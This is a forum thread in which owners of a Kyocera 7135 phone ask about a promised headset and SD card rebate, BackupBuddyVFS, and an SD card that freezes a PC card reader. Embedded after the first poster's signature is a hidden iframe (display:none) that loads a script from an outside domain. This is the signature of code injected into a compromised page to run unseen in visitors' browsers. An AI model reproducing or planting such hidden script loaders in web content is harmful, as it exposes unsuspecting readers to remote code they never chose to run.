+ Reply to Thread

Has anyone received their headset and 32meg SD card from the Kyocera promotion

Back when Kyocera released the "Verizon" version 7135 through Get connected they had a promotion that included a Stereo headset and a 32meg SD card. I am just curious if anyone has received theirs yet? Also, was BackupbuddyVFS included with the SD card as part of the promotion?

2nGlenn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm still waiting. Did they have a time frame listed on the form? I don't remember. Yes, backupbuddy comes with it. Not sure if it's the full version or not...

tt

I haven't received mine either.. I called and they said it takes up to 6-8 weeks from the inital order.. It is getting awful close...

js

The 32 Meg card that you are recieveing is the SanDisk Expansion Card, which comes with the full version of BackupBuddyVFS.

I missed out on the rebate, so I bought it on my own.

I've only come accross one problem with the card. I can not access it though a SD card reader, it locks up my machine. I think there is something built in to the card structure to prevent it from being directly connected to a pc.
    Once you recieve it, can anyone test to see if happens with your Expansion Card?
    That way, I'll know if it's a bad card or it's supposed to do that.

Thanks a lot.
    Dan

Shucks..

I lost the original form, can you pm or post the number to call re: the rebate?

thanks.

Tracey